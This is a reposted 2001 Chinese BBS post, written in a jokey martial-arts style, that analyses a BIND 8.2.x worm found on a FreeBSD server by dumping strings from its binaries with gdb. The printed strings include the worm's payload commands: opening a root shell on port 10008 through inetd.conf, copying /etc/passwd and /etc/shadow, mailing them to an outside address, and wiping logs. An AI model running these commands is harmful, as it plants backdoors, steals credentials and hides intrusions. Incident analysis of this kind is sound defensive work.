当前位置:Linux教程 - Linux - 大战黑客传之夜审奸细

大战黑客传之夜审奸细

发信人: melodies (明天就做窝), 信区: FreeBSD
标 题: 大战黑客纪实-4(转)
发信站: BBS 水木清华站 (Sun Jul 1 21:02:35 2001)

文章出处:北邮BBS


作者 clubk (快乐草包) 看板 FreeBSD
标题 大战黑客记实(4)
时间 Sun Apr 15 00:34:50 2001
———————————————————————————————————————

(续)

要看scan.sh调遣的兵丁rundb和scan可是这两个都是ELF 派的,铁齿钢牙, 嘴不好撬啊....



忽然想到营中有一个强悍酷吏......无论官兵窃贼闻之无不胆寒的........gdb是也!

吾与友立刻请出此人, 令之速速审问



只听堂上霹雳啪啦....@#$%&^%$....啪啦霹雳....( 哎, 老板限期破案, 用一点刑也是难免的吗)花了几个时辰, 把rundb 和scan打的皮开肉绽终于有了一星半点供词

rundb:.....@$*&$).....我是兔子!我是兔子!......

rundb:...(昏死过去了).....


看来还是我们武艺不精, 打的不是地方......
看看scan打昏了以后说了什么:


scan:.....啊!!!.....我也是.....兔子!!....

scan:..Usage: %s [c-block]

scan:..Invalid b-range

scan:..Unable to set

scan:.....我发誓!...我真的是....兔子!!.....

scan:..Invalid IP

scan:..Scan completed in %u seconds

scan:..Error: %s

scan:...(昏死过去了).....

scan:..echo %s >> hosts.log &


啪!!惊堂木一响! 有了!

gdb 不愧我等厚望啊...这里就是scan的秘密啦!

原来他从某个地方接受B 类地址为参数(见scan.sh)
搜索完成后将符合某些条件的地址写在hosts.log里

最后由hack.sh->bind.sh->bind去处理

B 类地址则是由rundb来提供的(参见scan.sh的供述)

估计rundb是一个搜索路由器的网路表的家伙

专门为scan提供可以访问的B类地址


我等人心大振, 再接再厉,

把dobind.sh里用到的bind也拖过来暴打一顿:

bind:..我不会说的....

bind:..用什么刑也没用....

bind:..欧! 啊!~~~~~....

bind:..啊....难道..没有人..知道..美人计吗...啊!~~~~

bind:..system does not seem to be vulnerable

bind:..system seems to be running bind 8.2.x

bind:..ptr is too low to be successfully exploited
啊! exploit! 攻击! 而且是攻击bind 8.2.x的

忽然我等想起了去年底今年初江湖上流传的小道消息



有关bind最新发现的一些严重的安全漏洞

主要是由于程序设计的小小缺陷, 导致易受缓冲区溢出攻击

堆栈溢处后程序出错, 黑客的代码以被攻击程序的身份得到系统的执行

缓冲区溢出攻击是江湖上最著名的攻击方式

乃是一门武林绝学, 与葵花宝典齐名(当然,不用自宫的说)

具体的解释我就不细说了, 而且我也不一定说得清楚

各位自己看官去找些武林秘籍看吧(记住: 万万不可自宫啊!!)



继续审问....

bind:.....(昏死过去了).....

bind:..PATH=''/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin'';



bind:..export PATH;export TERM=vt100;
bind:..echo ''10008 stream tcp nowait root /bin/sh sh'' >>/etc/inetd.conf;

bind:..killall -HUP inetd;ifconfig -a>system.data;

bind:..cat /etc/passwd >>system.data;cat /etc/shadow >>system.data;

bind:..mail xxxxxxx@263.net
bind:..rm -fr /.bash_history;echo >/var/log/messages;

bind:..rm -rf /var/log/maillog;

bind:.....(又昏死过去了).....



天哪! 他都干了些什么!
各位看官, 看来这个江湖黑客不仅仅是一个一般的侠客



从程序的设计水平来看, 乃是这世上一等一的高手

不过, 从黑客的邮件地址看, 又不象啊

如果国内有了这等高手....哎呀....大喜啊....

中华之腾飞指日可待啊.......

可是, 如果是有人不过是捡了别人写的武林套路

拿来比划几下就号称的了武林真传....也不是不可能啊

现在, 大营中重要大员的信息(/etc/passwd; /etc/shadow)泄漏无疑

黑客还把大营的的所有通信接口信息弄去(ifconfig -a)

寄到自己的免费信箱里去了

并且顺便给自己开了一个后门(修改/etc/inetd.conf)


至此, 黑客的手下的来路和目的都比较清楚了

他利用bind的安全漏洞, 攻击并取得大营主管之权限(root)

然后安插他的兵丁入住大营器械房(/dev).....这些人有从此营出发

去探其他的各路营寨, 找到有同样漏洞的营寨,

这些兵丁自动地再行攻击, 每次都取得各路营寨的重要信息

飞书传邮, 一路辗转, 直到黑客的老巢!



呜呼! 吾友之营寨, 命在旦夕矣!